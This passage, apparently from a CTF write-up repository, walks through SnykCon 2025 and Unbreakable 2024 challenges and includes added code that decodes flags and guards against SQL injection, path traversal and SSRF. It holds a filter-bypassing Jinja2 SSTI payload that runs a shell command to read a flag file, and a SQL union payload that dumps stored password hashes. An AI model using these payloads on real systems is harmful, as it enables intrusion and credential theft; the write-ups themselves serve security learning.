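def find_shift(cipher: str, prefix: str = "flag{"):
    """Try every non-trivial shift of both schemes and return
    (scheme, shift, plaintext) for the first candidate starting with prefix."""
    for shift in range(1, 26):
        cand = rot_letters(cipher, shift)
        if cand.startswith(prefix):
            return ("letters", shift, cand)
    for shift in range(1, 94):
        cand = rot_printable(cipher, shift)
        if cand.startswith(prefix):
            return ("printable", shift, cand)
    return None


# Inputs taken from the Indicium and An Offset Among Friends writeups.
INDICIUM = "gmbh|cc265ceg113b731ec768c9eg95b98175~"
OFFSET = "gmbh|d65426593642d22b87bfbb939f54918d~"
# Constructed ROT13 sample standing in for the Either Or string.
ROT13_SAMPLE = rot_letters("flag{example}", 13)

if __name__ == "__main__":
    for c in (INDICIUM, OFFSET, ROT13_SAMPLE):
        print(c, "->", find_shift(c))
```

The letters-only pass is tried first because a ROT13 string keeps its braces; when it fails on a brace-rotated input like Indicium's, the printable pass finds the shift that restores `{`.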
![image](https://github.com/user-attachments/assets/af444656-be6d-4053-aa0a-3e65e46e7ac3)

Copied the value and rotated it in CyberChef:

![image](https://github.com/user-attachments/assets/72609ff9-86ef-4a53-afc3-c77ac8bb3713)

Now that I know the secret password, I give it to the binary and get the flag:

![image](https://github.com/user-attachments/assets/500c007f-183a-438b-bb1f-36d8cef4c30a)

flag{f074d38932164b278a508df11b5eff89}

--------------------------------------------------------------------------------
/SnykCon2025/Rev/Math_for_Me.md:
--------------------------------------------------------------------------------

# Math for Me

![image](https://github.com/user-attachments/assets/18e93b6e-2de7-409f-81cb-dee57c13a725)

Attachment: [math4me](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/math4me)

## Writeup

I decompiled the binary and gave the code to ChatGPT, asking it to solve it for me. Because I'm lazy.

![image](https://github.com/user-attachments/assets/d06c05e2-c946-4543-ace5-08f6f7e576b3)

This AI is getting better every day. I was surprised to see it was right; I was very sure it was lying to me.
![image](https://github.com/user-attachments/assets/e517f618-b2ab-4c31-b3ee-396465eb89c4)

Another way to get the flag, in a less dumb way, would be to patch the binary, just like I did in [Rock Paper Psychic](https://github.com/LazyTitan33/CTF-Writeups/blob/1c001163cb7482bba6c23b94f5f6e929eb9cda40/Huntress-CTF-2023/Misc/Rock_Paper_Psychic.md), where it is making the check for the special number:

![image](https://github.com/user-attachments/assets/613d07dd-7f6a-48f6-97fe-59152119bfa9)

Now that I changed the JZ to JNZ, I can pass any value:

![image](https://github.com/user-attachments/assets/d253f5f0-02c5-400a-93aa-0e4c5e48d00b)

And get the flag:

![image](https://github.com/user-attachments/assets/320823a7-03b9-4019-87d5-c0f59c08b0b6)

flag{h556cdd`=ag.c53664:45569368391gc}

--------------------------------------------------------------------------------
/SnykCon2025/Rev/letters2nums.md:
--------------------------------------------------------------------------------

# letters2nums

![image](https://github.com/user-attachments/assets/48bf9194-8a62-40ff-a1e4-2aedc3410d57)

Attachment: [encflag.txt](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/SnykCon2025/attachments/encflag.txt) [letters2nums.elf](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/letters2nums.elf)

## Writeup

I was doing multiple challenges at the same time at this point and I wasn't very interested in the Rev category, so I just copy-pasted code from the binary after decompiling it in Ghidra and asked ChatGPT what it sees:

![image](https://github.com/user-attachments/assets/ac3b8c7c-9907-4738-b94c-34fbf6c42a01)

It very nicely gave me working code on the first try:

```python
with open("encflag.txt", "r") as f:
    encoded_numbers = [int(line.strip()) for line in f.readlines()]

decoded_flag = ""
for num in encoded_numbers:
    # Each number packs two ASCII characters: the high byte first, then the low byte
    char1 = (num >> 8) & 0xFF
    char2 = num & 0xFF
    decoded_flag += chr(char1) + chr(char2)

print("Decoded flag:", decoded_flag)
```

flag{3b050f5a716e51c89e9323baf3a7b73b}

--------------------------------------------------------------------------------
/SnykCon2025/Warmups/Screaming_Crying_Throwing_up.md:
--------------------------------------------------------------------------------

# Screaming Crying Throwing up

![image](https://github.com/user-attachments/assets/cd4974a9-4119-49aa-b18e-93328da37cc2)

Attachment: [screaming.bin](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/screaming.bin)

## Writeup

The title of the challenge as well as the description point us to the [scream cipher](https://github.com/matthewpwatkins/scream-cipher). We can use [this](https://scream-cipher.netlify.app/) online tool to convert our payload.

However, it is important to open the file in a proper text editor. When read from a PowerShell terminal or bash, the strange characters are not output correctly and won't decode to our flag.
I opened it in Sublime Text:

![image](https://github.com/user-attachments/assets/ce7243a8-270a-4aa9-8ec5-605018e3e086)

Now I can "translate" it and get the flag:

![image](https://github.com/user-attachments/assets/42d20707-5bc1-44e8-8db6-e78acd0ac6ef)

flag{edabfbafedcbbfbadcafbdaefdadfaac}

--------------------------------------------------------------------------------
/SnykCon2025/Warmups/Zero_Ex_Six_One.md:
--------------------------------------------------------------------------------

# Zero Ex Six One

![image](https://github.com/user-attachments/assets/2fb01f42-dca8-4ae2-8813-fa5b75a09d52)

Attachment: [flag.txt.encry](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/flag.txt.encry)

## Writeup

The challenge description tells me to XOR the file that I was given:

![image](https://github.com/user-attachments/assets/173c85dc-9e88-4d03-acde-8590a395e4b9)

The key is the title of the challenge (0x61), sneaky.
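Zero Ex Six One is a single-byte XOR with key 0x61. As an added example, not from the original writeup, this block shows the known-plaintext recovery that works even when the title does not give the key away: for a repeating key of length n and a known prefix (the `flag{` format) at least n bytes long, each key byte is `cipher[i] ^ plaintext[i]`, and the rest of the prefix checks the guess. The ciphertexts are constructed inline from a made-up plaintext; the real flag file is not reproduced.

```python
def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; a one-byte key is the Zero Ex Six One case."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_repeating_key(cipher: bytes, crib: bytes, key_len: int):
    """Known-plaintext key recovery for a repeating-key XOR.
    crib is the plaintext known to sit at offset 0 (e.g. b"flag{").
    Returns the key, or None if the crib is too short or contradicts the guess."""
    if key_len < 1 or len(crib) < key_len or len(cipher) < len(crib):
        return None
    key = bytes(cipher[i] ^ crib[i] for i in range(key_len))
    # The crib bytes beyond the first key period must agree with the recovered key.
    for i in range(key_len, len(crib)):
        if cipher[i] ^ key[i % key_len] != crib[i]:
            return None
    return key


def guess_key_length(cipher: bytes, crib: bytes, max_len: int = 16):
    """Shortest key length (<= max_len) consistent with the crib, as (length, key), or None."""
    for n in range(1, max_len + 1):
        key = recover_repeating_key(cipher, crib, n)
        if key is not None:
            return n, key
    return None


# Constructed sample plaintext; the real flag is not reproduced here.
PLAINTEXT = b"flag{constructed_sample_not_the_real_one}"
CIPHER_0X61 = xor_bytes(PLAINTEXT, b"\x61")   # the writeup's key, 0x61 == "a"
CIPHER_K3Y = xor_bytes(PLAINTEXT, b"k3y")     # a 3-byte repeating key for comparison

if __name__ == "__main__":
    print(recover_repeating_key(CIPHER_0X61, b"flag{", 1))
    print(guess_key_length(CIPHER_K3Y, b"flag{"))
    print(xor_bytes(CIPHER_K3Y, b"k3y"))
```

The consistency check is what makes the length guess trustworthy: a too-short key length produces bytes that disagree with the remaining crib positions, so the first length that survives the whole prefix is the shortest key that fits.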

flag{c50d82c0a25f3e644d0702b41dbd085a}

--------------------------------------------------------------------------------
/SnykCon2025/Web/Plantly.md:
--------------------------------------------------------------------------------
# Plantly
![image](https://github.com/user-attachments/assets/28fe5509-c381-4cf6-ad85-bf12b63b0b34)

Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/plantly.zip)

## Writeup

I get a pretty website about plants:

![image](https://github.com/user-attachments/assets/74c1ff9a-4ba0-4760-9c07-980529103767)

From the source code, I can already see the potential for SSTI, as unsanitized user input is passed to `render_template_string`:

![image](https://github.com/user-attachments/assets/c9c2fdf5-cf9e-4f9a-9186-5c02ad48027f)

After registering an account and logging in, I place a custom order with the standard SSTI `{{7*7}}` payload:

![image](https://github.com/user-attachments/assets/a9135ec0-a569-407c-b55f-54a6f085e309)

I go through the shopping flow and print out the receipt, which confirms the SSTI:

![image](https://github.com/user-attachments/assets/26e73620-03df-495e-be5a-68f0751738b3)

I have exploited SSTI plenty of times, so I had a [payload](https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/) ready that bypasses multiple types of filters:

```text
{{request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat /src/flag.txt')['read']()}}
```
![image](https://github.com/user-attachments/assets/1a485b28-4f0c-41ed-a6a3-bf8bd8b223d2)

flag{982e3b7286ee603d8539f987b65b90d4}

--------------------------------------------------------------------------------
/SnykCon2025/Web/TimeOff.md:
--------------------------------------------------------------------------------
# TimeOff
![image](https://github.com/user-attachments/assets/42a19e34-1933-4b47-bcfc-0ce53de65ba4)

Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/timeoff.zip)

## Writeup

This website allows me to make a request for time off. It's a POST request that also allows me to upload a file. However, the `file_name` parameter is vulnerable to path traversal according to the [Snyk](https://docs.snyk.io/scm-ide-and-ci-cd-integrations/snyk-ide-plugins-and-extensions/visual-studio-code-extension) extension for Visual Studio Code :wink::

![image](https://github.com/user-attachments/assets/5e5cfc48-5281-42fb-9513-98d1c03fdbad)

So I just read the flag from the path indicated in the Dockerfile:

![image](https://github.com/user-attachments/assets/54298171-30e3-472c-a941-bcb32b7732f1)

The 302 redirect leads me directly to the flag:

flag{52948d88ee74b9bdab130c35c88bd406}

--------------------------------------------------------------------------------
/SnykCon2025/Web/Unfurl.md:
--------------------------------------------------------------------------------
# Unfurl
![image](https://github.com/user-attachments/assets/71cefee1-9863-4208-beb9-cfe01ee53cea)

Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/unfurl.zip)

## Writeup

In the source code I can see that there is a filter on the client IP to ensure only localhost can access it:

![image](https://github.com/user-attachments/assets/891bf57d-9aa6-48e7-b699-c75c8c86bae1)

This would give me command execution, but it also means I need to find an SSRF vulnerability.
The internal app is also running on a random port, but we know the range, which makes it easy to enumerate:

![image](https://github.com/user-attachments/assets/cff1474f-825f-4624-83f0-2843645e5459)

The functionality of the website itself is basically just an SSRF; there is no filter that we need to bypass. I sent the request to Intruder, specifying the port range we want to hit in order to find the internal app:

![image](https://github.com/user-attachments/assets/8b86dcb6-4fc5-4aa5-8749-a0593ed7dd18)

I also used grep to find the request that has the flag:

![image](https://github.com/user-attachments/assets/e8a8eb0f-01c2-4b33-8dd3-b4149db51230)

flag{e1c96ccca8777b15bd0b0c7795d018ed}

--------------------------------------------------------------------------------
/SnykCon2025/Web/Weblog.md:
--------------------------------------------------------------------------------
# Weblog
![image](https://github.com/user-attachments/assets/9f22e50c-d953-431d-8507-0936eeff49d7)

Attachment: [challenge.zip](https://github.com/LazyTitan33/CTF-Writeups/raw/refs/heads/main/SnykCon2025/attachments/weblog.zip)

## Writeup

I can quickly see a SQL injection vulnerability in the source code of the `/search` endpoint:

![image](https://github.com/user-attachments/assets/cd7d7908-332a-420b-89c0-5a24c8f055f3)

Using the following syntax, I can get the admin password hash:

```text
' union select 1,2,3,4, group_concat(username,password) from users#
```

![image](https://github.com/user-attachments/assets/705da9ec-1673-4b2c-9759-d2845d9baf65)

Luckily the hash is crackable and we get the admin password:

![image](https://github.com/user-attachments/assets/73d0d6ce-e838-4564-9015-12dea91287c5)

In the source code, I can see that the admin can execute a command; there's an attempt at a filter in `DISALLOWED_CHARS`:

![image](https://github.com/user-attachments/assets/bd48e98b-6033-4dea-980b-5e2f9c883475)

It is, as expected, insufficient to prevent command injection:

![image](https://github.com/user-attachments/assets/376ecd78-5271-4ab7-a396-d019082347aa)

And I have the flag:

![image](https://github.com/user-attachments/assets/ea6f1f2e-e925-43f6-bb0c-b53b2a9dcfaa)

flag{b06fbe98752ab13d0fb8414fb55940f3}

--------------------------------------------------------------------------------
/SnykCon2025/attachments/Padding_Gambit.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/Padding_Gambit.7z

--------------------------------------------------------------------------------
/SnykCon2025/attachments/an-offset:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/an-offset

--------------------------------------------------------------------------------
/SnykCon2025/attachments/calculator.py:
--------------------------------------------------------------------------------
```python
import sys

def simple_calculator():
    print("Welcome to the Simple Calculator!")
    print("Enter a mathematical expression:", end=' ')
    expression = input()
    sys.stdin.close()
    try:
        # Letter blacklist: the challenge's intentionally weak filter in front of eval().
        blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        for x in expression:
            if x in blacklist:
                print(f"{x} is not allowed!")
                exit()
        result = eval(expression)
        print(f"The result is: {result}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    simple_calculator()
```

--------------------------------------------------------------------------------
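For the Weblog writeup above, an added example (mine, not the challenge's or the repository's code) that rebuilds a tiny users/posts schema in an in-memory SQLite database, reproduces the string-concatenated `/search` query that leaks the admin hash with the writeup's union payload, and shows the parameterised form that treats the same payload as plain text. The schema, column names and rows are constructed, and the payload is adapted to SQLite, which uses `--` for comments instead of MySQL's `#` and whose `group_concat(X, Y)` treats `Y` as a separator.

```python
import sqlite3

# Constructed sample data: one admin whose (fake) hash must never reach search results.
SCHEMA = """
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
CREATE TABLE posts(id INTEGER, title TEXT, body TEXT, author TEXT, created TEXT);
INSERT INTO users VALUES (1, 'admin', 'placeholder-hash-not-a-real-value');
INSERT INTO posts VALUES (1, 'Hello', 'first post', 'admin', '2025-01-01');
INSERT INTO posts VALUES (2, 'Weblog tips', 'second post', 'bob', '2025-01-02');
"""

# The writeup's payload, adapted for SQLite: '||' concatenation inside group_concat
# (SQLite's second argument is the separator) and '--' instead of the MySQL '#' comment.
UNION_PAYLOAD = "' union select 1,2,3,4, group_concat(username||':'||password) from users--"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # The pattern the writeup found: user input spliced straight into the SQL text,
    # so a quote closes the literal and the rest of the input becomes SQL.
    sql = f"SELECT id, title, body, author, created FROM posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Same query, but the term travels as a bound parameter: the quote cannot
    # terminate the literal and 'union select ...' is just text to match against.
    sql = "SELECT id, title, body, author, created FROM posts WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def leaked_credentials(rows: list) -> list:
    # Detection helper for a test or log review: any result cell that carries the
    # username:hash blob the union query smuggles into the posts result set.
    return [cell for row in rows for cell in row
            if isinstance(cell, str) and cell.startswith("admin:")]


if __name__ == "__main__":
    db = fresh_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("safe:", search_safe(db, UNION_PAYLOAD))
```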
/SnykCon2025/attachments/challenge.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/challenge.elf

--------------------------------------------------------------------------------
/SnykCon2025/attachments/click.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/click.pcapng

--------------------------------------------------------------------------------
/SnykCon2025/attachments/crabshell:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/crabshell

--------------------------------------------------------------------------------
/SnykCon2025/attachments/donutshop.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/donutshop.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/echo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/echo

--------------------------------------------------------------------------------
/SnykCon2025/attachments/either-or:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/either-or

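For the TimeOff writeup above, an added example (mine, not the challenge's code) of the two shapes a `file_name` handler can take: the naive join that Snyk flags as path traversal, and a resolved-path check that refuses any name escaping the upload directory. The upload directory and the sample names are assumptions.

```python
import os
import posixpath


def unsafe_upload_path(upload_dir: str, file_name: str) -> str:
    # What the vulnerable pattern amounts to: whatever the client sends is joined
    # onto the base directory, so '../' segments walk out of it and an absolute
    # file_name replaces the base directory entirely.
    return os.path.join(upload_dir, file_name)


def safe_upload_path(upload_dir: str, file_name: str) -> str:
    """Return the full path for file_name inside upload_dir, or raise ValueError.

    The decision is made on the normalised absolute path, not on the raw string,
    so 'a/../../flag', './../flag' and '/flag' are all rejected by the same rule.
    """
    base = os.path.realpath(upload_dir)
    candidate = os.path.realpath(os.path.join(base, file_name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"file_name escapes upload directory: {file_name!r}")
    if candidate == base:
        raise ValueError("file_name resolves to the upload directory itself")
    return candidate


def upload_path_allowed(upload_dir: str, file_name: str) -> bool:
    try:
        safe_upload_path(upload_dir, file_name)
        return True
    except ValueError:
        return False


def is_traversal_attempt(file_name: str) -> bool:
    # Cheap pre-filter on the raw parameter for logging and alerting (not a
    # substitute for the resolved-path check): a parent segment surviving
    # normalisation, or an absolute path, is never a legitimate upload name.
    parts = posixpath.normpath(file_name).split("/")
    return file_name.startswith("/") or ".." in parts


if __name__ == "__main__":
    for name in ["report.pdf", "../../../src/flag.txt", "/etc/passwd", "x/../../y"]:
        try:
            print(name, "->", safe_upload_path("/var/app/uploads", name))
        except ValueError as exc:
            print(name, "-> rejected:", exc)
```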
--------------------------------------------------------------------------------
/SnykCon2025/attachments/encflag.txt:
--------------------------------------------------------------------------------
```text
21608
26995
8297
29472
24864
27759
28263
8289
28260
8291
28526
30319
27765
25701
25632
30561
31008
29807
8308
29305
8289
28260
8296
26980
25888
29800
25888
26220
24935
14950
27745
26491
13154
12341
12390
13665
14129
13925
13617
25400
14693
14643
12851
25185
26163
24887
25143
13154
32000
```

--------------------------------------------------------------------------------
/SnykCon2025/attachments/flag.txt.encry:
--------------------------------------------------------------------------------
```text
TQYSQSTRWUUQVQSUPQYTk
```

--------------------------------------------------------------------------------
/SnykCon2025/attachments/freeRangePackets.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/freeRangePackets.pcapng

--------------------------------------------------------------------------------
/SnykCon2025/attachments/idiotic.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/idiotic.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/its-go-time:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/its-go-time

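For the two warm-up attachments above, encflag.txt and flag.txt.encry, an added example (mine, not the challenge author's code). The first part packs and unpacks two ASCII bytes per 16-bit integer, the format the writeup's decoding loop reads; the second shows why a single-byte XOR with key 0x61 (the Zero Ex Six One title) looks like a short run of capitals in a terminal: every plaintext byte in `a`..`g`, including all of `flag{`, lands in the control range and is not displayed. The XOR input is constructed from the published flag; the key-recovery loop generalises the writeup's trick to an unknown single-byte key.

```python
from typing import List, Optional

# encflag.txt, copied from the attachment above: one 16-bit big-endian word per line.
ENCFLAG_WORDS = [
    21608, 26995, 8297, 29472, 24864, 27759, 28263, 8289, 28260, 8291, 28526, 30319,
    27765, 25701, 25632, 30561, 31008, 29807, 8308, 29305, 8289, 28260, 8296, 26980,
    25888, 29800, 25888, 26220, 24935, 14950, 27745, 26491, 13154, 12341, 12390, 13665,
    14129, 13925, 13617, 25400, 14693, 14643, 12851, 25185, 26163, 24887, 25143, 13154,
    32000,
]


def words_to_text(words: List[int]) -> str:
    # Each word holds the high byte first (num >> 8) then the low byte (num & 0xFF),
    # exactly as the writeup's loop reads it. An odd-length message is padded with a
    # NUL in the low byte, which is why the final word 32000 (0x7D00) is '}' + NUL.
    raw = b"".join(w.to_bytes(2, "big") for w in words)
    return raw.rstrip(b"\x00").decode("ascii")


def text_to_words(text: str) -> List[int]:
    # Inverse transform: pad to an even length and pack big-endian.
    raw = text.encode("ascii")
    if len(raw) % 2:
        raw += b"\x00"
    return [int.from_bytes(raw[i:i + 2], "big") for i in range(0, len(raw), 2)]


def xor_bytes(data: bytes, key: int) -> bytes:
    # Single-byte XOR is its own inverse: xor_bytes(xor_bytes(d, k), k) == d.
    return bytes(b ^ key for b in data)


def terminal_view(data: bytes) -> str:
    # What `cat` or a PowerShell console shows: printable ASCII only. Control bytes
    # vanish, which is what makes the attachment look like 'TQYSQS...'.
    return "".join(chr(b) for b in data if 0x20 <= b < 0x7F)


def recover_single_byte_xor(data: bytes, marker: bytes = b"flag{") -> Optional[int]:
    # General form of the writeup's trick: try all 256 keys and keep the one whose
    # plaintext starts with the expected marker. Returns None if no key fits.
    for key in range(256):
        if xor_bytes(data, key).startswith(marker):
            return key
    return None


if __name__ == "__main__":
    print(words_to_text(ENCFLAG_WORDS))
    # Constructed round trip for the second warm-up: XOR the published flag with 0x61.
    enc = xor_bytes(b"flag{c50d82c0a25f3e644d0702b41dbd085a}\n", 0x61)
    print(terminal_view(enc), recover_single_byte_xor(enc))
```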
--------------------------------------------------------------------------------
/SnykCon2025/attachments/letters2nums.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/letters2nums.elf

--------------------------------------------------------------------------------
/SnykCon2025/attachments/math4me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/math4me

--------------------------------------------------------------------------------
/SnykCon2025/attachments/plantly.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/plantly.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/screaming.bin:
--------------------------------------------------------------------------------
```text
a̮ăaa̋{áa̲aȧa̮ȧaa̮áa̲a̧ȧȧa̮ȧaa̲a̧aa̮ȧa̲aáa̮a̲aa̲a̮aaa̧}
```

--------------------------------------------------------------------------------
/SnykCon2025/attachments/timeoff.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/timeoff.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/unfurl.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/unfurl.zip

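For the Unfurl writeup above, an added example (mine, not the challenge's code) of the guard the unfurl endpoint lacks: resolve the requested host before connecting and refuse loopback, link-local, private and otherwise non-global targets, non-HTTP schemes and unexpected ports, so a fetch can't be pointed at the localhost-only internal app. Name resolution is injected so the example runs offline; the hostnames and addresses in the fake resolver are constructed.

```python
import ipaddress
from typing import Callable, List
from urllib.parse import urlsplit

Resolver = Callable[[str], List[str]]

# Constructed DNS answers standing in for socket.getaddrinfo.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "localtest.me": ["127.0.0.1"],                  # public name, loopback answer
    "metadata.internal": ["169.254.169.254"],       # link-local metadata service
    "intranet.corp": ["10.0.0.5", "93.184.216.35"],  # one private, one public answer
}


def fake_resolve(host: str) -> List[str]:
    if host not in FAKE_DNS:
        raise ValueError(f"NXDOMAIN: {host}")
    return FAKE_DNS[host]


def is_forbidden_address(ip: str) -> bool:
    # Anything that is not globally routable (loopback, RFC 1918, link-local,
    # unspecified, reserved) plus multicast is off limits for an outbound fetch.
    addr = ipaddress.ip_address(ip)
    return (not addr.is_global) or addr.is_multicast


def check_unfurl_target(url: str, resolve: Resolver = fake_resolve,
                        allowed_ports=(80, 443)) -> str:
    """Return the URL if it may be fetched, else raise ValueError with the reason.

    A literal IP in the host part is checked directly; a hostname is checked on
    every resolved address, so a name with even one private answer is refused.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in allowed_ports:
        raise ValueError(f"port not allowed: {port}")
    try:
        addresses = [str(ipaddress.ip_address(parts.hostname))]
    except ValueError:
        addresses = resolve(parts.hostname)
    for ip in addresses:
        if is_forbidden_address(ip):
            raise ValueError(f"{parts.hostname} resolves to blocked address {ip}")
    return url


def unfurl_allowed(url: str, resolve: Resolver = fake_resolve) -> bool:
    try:
        check_unfurl_target(url, resolve)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for u in ["http://example.com/", "http://127.0.0.1:8080/", "http://localtest.me/",
              "http://[::1]/", "http://metadata.internal/", "ftp://example.com/"]:
        print(u, "->", "allowed" if unfurl_allowed(u) else "blocked")
```

The address that passed the check must also be the one the HTTP client connects to (pin it, or re-check inside the client's connection hook); letting the client resolve the name a second time reopens the door to a DNS rebinding answer.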
--------------------------------------------------------------------------------
/SnykCon2025/attachments/vulnscanner.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/vulnscanner.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/weblog.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/weblog.zip

--------------------------------------------------------------------------------
/SnykCon2025/attachments/who-is-jh.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/0841aee64688aa9e0cd0f5c46a7e9e51c55d345f/SnykCon2025/attachments/who-is-jh.zip

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/fake-add.md:
--------------------------------------------------------------------------------
# fake-add

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e2619114-d0d7-48d2-aebb-af89464d00a6)

# Solution

We can use [dogbolt](https://dogbolt.org/) to decompile small binaries, and with this one we find some interesting-looking bytes in it:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/31c424d8-1b3d-4957-b674-b518a6131aea)

I copied these locally:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2eb57967-4a73-443f-a553-3c381c1c48bb)

Removed the null bytes:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/27d2ec9d-564d-4575-897b-e2da0f45c3d6)

Added the two hex strings together and decoded the
resulting string in CyberChef:
![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/bfc2c26e-205c-49bc-ba79-b959f1f7908a)

We get our non-standardly formatted flag, but at least this time it was mentioned in the challenge description:

`CTF{th1s_is_ju5T_ADD}`

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/improper-configuration.md:
--------------------------------------------------------------------------------
# improper-configuration

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/3740cbd5-6aad-469c-845e-5201d5a61722)

# Solution

We can do some dynamic analysis on APK files by running the application in an emulator. An online one that I used is [appetize.io](https://appetize.io/upload), which lets us see what the app does and, if we create an account (I used a temporary email), also gives us network logs and more. For now, we just see the app saying to "check the rest in strings":

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aa3c9420-52a7-4e30-b45a-6b0f1b8cd9e1)

I used [this](http://www.javadecompilers.com/apk) online APK decompiler to get the decompiled Java code, saved it locally, grepped for that initial weird string and found the app name. I could also see the app name in the list of apps in the emulator, so I didn't really need to check the strings:

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/2600c45c-5e09-474f-a946-e49792a826c0)

That's it, that's the flag: `wlwkfwo2-3cscase-wdc`

Note: This was extremely annoying and frustrating, as there was no indication in the challenge description that the flag is in a non-standard format. This was an absolute guessing game. Incredibly horrible challenge.

--------------------------------------------------------------------------------
/Unbreakable-Individual-2024/password-manager-is-a-must.md:
--------------------------------------------------------------------------------
# password-manager-is-a-must

![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c438f29b-3e20-45b0-9b6c-3b86015e27a5)

# Solution

Running `strings` on the provided dump, we can tell that it's a process dump of `keepass.exe`.

